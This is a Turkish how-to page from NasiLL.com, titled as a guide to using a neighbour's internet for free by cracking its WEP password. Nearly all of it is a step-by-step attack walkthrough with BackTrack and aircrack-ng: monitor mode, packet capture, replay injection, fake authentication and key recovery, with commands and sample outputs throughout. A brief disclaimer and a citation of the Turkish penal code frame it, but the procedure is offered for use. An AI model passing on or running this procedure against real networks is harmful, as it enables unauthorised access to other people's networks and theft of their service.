Afrika Kampanyası
Komşunun interneti bedavaya nasıl kullanılır, WEP şifresi nasıl kırılır 
NasiLL.com sitesinden
|
Lüfen bu anlatılanları uygulama yapmak için kullanmayın; kanunlarımıza göre ağır bir suç olabilir. |
|
Neler Lazım
|
Gerekli Bilgi ve Beceriler
|
Yukarıdaki gerekli donanım ve kabiliyetler sizde varsa başlayabiliriz, eksiğiniz varsa hiç uğraşmayın sorun yaşayabilirsiniz.
1. Öncelikle tüm kırma ve bulma işlemleri için BackTrack linux sürümü lazım.
http://www.remote-exploit.org/backtrack_download.html adresindeki
http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd linki ile belirtilen CD imajı dosyasını indiriyoruz. cd imajı linki kırıksa adrese girip ilgili downloadları görebilirsiniz. Adreste USB için ve Wmware için de sürümler mevcut ama sorun yaşamamak için CD imajını indirseniz iyi olur.
2. bu .iso dosyasını elinizdeki CD yazma programları vasıtası ile boş bir cdye yazın.
3. Şimdi makinanızı bu BackTrack linux cdsinden açın. Makinanın cd den açılabilmesi için setup'dan boot seçeneklerinden cd'yi ilk sıraya almış olmanız gerekmektedir.
4. Makina açıldıktan sonra yavaş yavaş BackTrack'in dünyasına girmeye başlıyoruz. BackTrack etraftaki wireless internetleri bulabilmemiz ve kırabilmemiz için gerekli olan pekçok araç ile beraber gelen bir linux sürümüdür.
5. Burada KDE masaüstü ile açılma seçenmeğini seçin.
6. Biraz sonra artık BackTrack masa üstündeyiz.
7. Hemen sol alttaki ikonlardan ikincisi olan siyah terminal ekranı açmayı tıklıyoruz.
8. Konsolda iwconfig yazıyoruz. karşımıza şuna benzer bir çıktı gelmelidir.
lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.
ath0 IEEE 802.11b ESSID:"" Nickname:""
Mode:Managed Channel:0 Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:0 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Burada önemli olan wireless extensions olan yani wireless internet cihazı olarak tanınmış bir donanımımız var mı onu bulabilmek. ath0 adında donanımızın tanındığını görebiliyoruz. sizin ekranınızda :
lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.
eth1 IEEE 802.11b ESSID:"" Nickname:""
Mode:Managed Channel:0 Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:0 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
şeklinde de yazabilir o zaman sizin cihazının adı eth1dir. cihazının adını öğrendiyseniz devam ediyoruz. Ama :
lo no wireless extensions. eth0 no wireless extensions. wifi0 no wireless extensions. eth1 no wireless extensions.
çıktısı alıyorsanız malesef cihazlarınız BackTrack tarafından tanınmamış demektir. Tanıtmanın bir yolunu bulabilirseniz devam ediniz değilse bundan sonraki hiçbir komutu kullanamayacaksınız demektir.
9. Cihazımızın adını öğrendikten sonra aynı konsol ekranında airmon-ng start ath0 komutunu yazdığımızda :
Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
çıktısını alacağız böylece ath0 cihazı için monitör modu aktifleştirilmiş oldu. Bu sayade etraftaki wireless internet trafiğini dinlemeye başlayabileceğiz.
10. Şimdi internet trafiğini dinlemeye başlıyoruz konsola airodump-ng komutunu yazıyoruz. Şöyle bir çıktı alacağız.
CH 9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:09:5B:1C:AA:1D 11 16 10 0 0 11 54. OPN NETGEAR
00:14:6C:7A:41:81 34 100 57 14 1 9 11 WEP WEP bigbear
00:14:6C:7E:40:80 32 100 752 73 2 9 54 WPA TKIP PSK teddy
BSSID STATION PWR Lost Packets Probes
00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 2 14
(not associated) 00:14:A4:3F:8D:13 19 0 4 mossy
00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 0 5
00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 99 teddy
buradaki bilgiler şöyle: CH kanal numarası, ENC şifreleme metodudur burada WEP görmeliyiz. WEP görebildiğimiz ağ yoksa malesef kıracak birşey de yoktur. BSSID ağın numarası ESSID ise Ağın Adıdır. alttaki bilgiler ise ağlara bağlı olan ve bağlanmakta olan kullanıcıların numaralarıdır.
buradaki ekrandan şifresini kıracağımız ağı belirleyeceğiz, ağın adını, numarasını, kanal numarasını ve tabiki şifreleme sistemini inceliyoruz. Bize uygun bir WEP şifrelmesi varsa işlemlere başlayabiliriz. WEP şifreli bir ağ seçip onun kanal numarasını öğreniyoruz örneğin burada 11 numaralı kanal.
Bu arada farkettiyseniz airodump sürekli CH değiştiriyor, yani tüm kanalları taramaya çalışıyor. Zaten hangi kanala bakacağımızı seçmemizin sebebi de bu, airodump sürekli kanal değiştirip tüm kanalları taramaya çalışırsa kırma işlemini yapamayız, tek bir kanala konsantre olacağız. Bu örneğimizde 11 numaralı kanal, sizin listeniz daha değişik olabilir.
11. şimdi konsolda CTRL+C ye basarak o an çalışan airodump'ı durduruyoruz. yeni komut yazıyoruz :
airodump-ng -c 11 --ivs -w yakala ath0
bu komutla sadece 11 nolu kanalı dinleyeceğiz ve yakala dosyasında çıktıları biraz sonra kırabilmek için kaydedeceğiz, ayrıca --ivs komutu ile de tüm trafiği kaydetmeyip yalnızca bağlantı datalarını kaydedeceğiz.
bu komuttan sonra şuna benzer bir ekran göreceksiniz.
bu ekranda #Data yakalamayı başardığınız şifreli paket sayısıdır, #/s ise saniyede yakalanan data sayısıdır, biraz sonra bunların sayısında büyük artışlar oluşturmayı başaracağız. Normalde WEP kırmak için enaz 30.000 veya 40.000 adet data yakalamalısınız, saatlerce bekleyip 100 data ancak yakalandığını görüp umutsuzluğa kapılmayın biraz sonra bunların sayısını istediğimiz noktaya çıkaracağız.
12. datalarımızın biriktiği konsol ekranı öylece açık kalsın.
bir terminal ekranı daha açalım artık birden fazla komut aynı anda çalıştıracağız. Bu yeni ekrana şunu yazıyoruz:
aireplay-ng -3 -e KIRACAĞIMIZAĞINADI -b KIRACAĞIMIZAĞINNUMARASI ath0
aireplay-ng -3 -e 3Com274a -b 00:12:A9:0C:F8:45 ath1
gibi veya
aireplay-ng -3 -e AIRTIES -b 00:12:A9:1C:a8:35 eth0 gibi
Böylece linuxa eğer bu isimdeki ve bu numaradaki ağa ait bir bağlantı datası yakalarsan bu datayı kaydet ve tekrar tekrar ağa geri gönder demiş olduk. Bu sayede ağ trafiğini öyle bir arttıracağız ki 5-10 dakikada yüzbinlerce dataya ulaşabileceğiz. Ki bize 30-40.000 data yetecek.
Eğer kartınız bu kadar büyük data göndermini desteklemez ise ileriki adımlar sırasında burada overflow alabilirsiniz, tekrar bu adıma dönüp bu komutu -q 12 parametresi ile çalıştırın şöyle :
aireplay-ng -3 -q 12 -e AIRTIES -b 00:12:A9:1C:a8:35 eth0
bu saniyede sadece 12 data gönder demek ama böyle olunca 5 dakikada toplayacağınız datayı 1 saatte toplayacaksınız belkide. Neyse önemli değil. bu adımı geçiyoruz.
bu terminal ekranı açık kalsın. İlk bağlantı datasını yakaladığında hemen replay yapmaya başlayacak ve bir önceki ekrandaki #Data'nın altındaki rakamın ayaklarınızın yerden kesilmesine sebep olacak şekilde tıkır tıkır artmaya başlamasına şahit olacaksınız.
13. Eğer bir önceki replay komutunuz hiçbir bağlantı yakalayamazsa doğal olarak hiçbirşeyi tekrar tekrar gönderemeyecektir. Sizin #Data'nızda artmayacak. Ama merak etmeyin bunun da çözümü var. Yalandan bir bağlantı kurup bunu kullanabiliriz. iki terminal ekranımız açık, şimdi bir üçüncüyü açın. Buna da şu komutu yazın:
aireplay-ng -1 6000 -q 10 -o 10 -a HEDEFAĞINNUMARASI ath0
böylece 3. terminal ekranında yalandan bir bağlantı yaparken 2.ekran onu hemen görecek ve
şeklinde çoklamaya başlayacak
ve 1.ekranda da #Datalar artmaya başlayacak.
14. Datalar yeterince arttığında artık bu şifreli dataları kırabiliriz. 4.bir terminal ekranı açıyoruz ve
aircrack-ng -a 1 -b HEDEFAĞın mac adresi yakala.ivs
komutunu yazıyoruz. Aircrack bu paketleri analiz edip kırmaya başlayacak ve şifreyi bulduğunda bize söyleyecek, eğer bulamaz ise KEY NOT FOUND try 40.000 key diye yazacak ve 40.000 kaydı görünce kendisi otomatik tekrar kırmayı deneyecek, kıramaz ise datanın artmasını bekelyecek ve deneyecek; bulduğunda
KEY FOUND ! : 0102030405
şekliden bize bildirecek, artık windowsa geçip bu şifreyi hedef ağa bağlanırken sorulan yere yazarak kolayca bağlanabiliriz.
Toplamda sadece 10 dakikada bu işlemler bitmiş oluyor.
Bu kadar basit..!
Not: Bu açıklamalar her ne kadar illegal bir yöntemin NasiLL anlatımı olsa da dikkatli okur ve anlarsanız aynı zamanda internetinizi NasiLL daha güvenli hale getirebileceğinizi de anlatmaktadır. Sistemin açıklarını öğrendiniz. Sonuç olarak WEP şifreleme yönteminin pek güvenli olmadığını görmüş oldunuz. Ayrıca başkasının ağına izinsiz girmek ve kullanmak suç teşkil edeceğinden maddi manevi sorumluluk tamamen size ait. Biz bunun ne kadar kolay olduğunu ve WEP şifrelemesinin güvensiz olduğunu gösterdik. Güvenlik önlemi almak için bu nasıldan devam ediniz :Wireless internet nasıl güvenli hale getirilir ve izinsiz girişler engellenir
[düzenle] Kaynaklar :
Türk Ceza Kanunu Kanun No. 5237 Karşılıksız yararlanma
MADDE 163. - (2) Telefon hatları ile frekanslarından veya elektromanyetik dalgalarla yapılan şifreli veya şifresiz yayınlardan sahibinin veya zilyedinin rızası olmadan yararlanan kişi, altı aydan iki yıla kadar hapis veya adlî para cezası ile cezalandırılır.
Ayrıca bakınız: Caiz mi? http://www.zaman.com.tr/yazar.do?yazino=613131Nasıl en son NasiLL.com anonim kullanıcısı 38.107.179.230 tarafından 31 Ocak 2009 tarihinde değiştirildi.
NasiLL.com içeriği GNU özgür Belgeleme Lisansı kapsamı altındadır.
